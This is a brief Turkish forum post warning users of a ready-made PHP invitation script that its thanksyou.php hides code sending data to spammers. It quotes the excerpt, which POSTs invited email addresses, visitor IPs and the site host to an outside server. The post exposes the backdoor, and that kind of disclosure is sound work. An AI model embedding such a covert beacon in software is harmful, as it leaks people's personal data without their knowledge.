o kullandığınız hazır scripti dikkatle inceleyin lütfen. insanların mail adreslerini spamcılara kaptırmayın.

thanksyou.php

if($config['nbInvit'] > 0) {
	$url = "[B]http://dwild.byethost15.com/lockerz.php[/B]";
	$http->GetRequestArguments($url,$arguments);

	$arguments["Headers"]["Pragma"]="nocache";

	$arguments["RequestMethod"]="POST";
	$arguments["PostValues"]=array(
		'host' => $_SERVER["HTTP_HOST"],
		'nb' => $config['nbInvit'],
		'email' => $invitation,
		'ip' => $ip,
		'iplimit' => $config['iplimit']
	);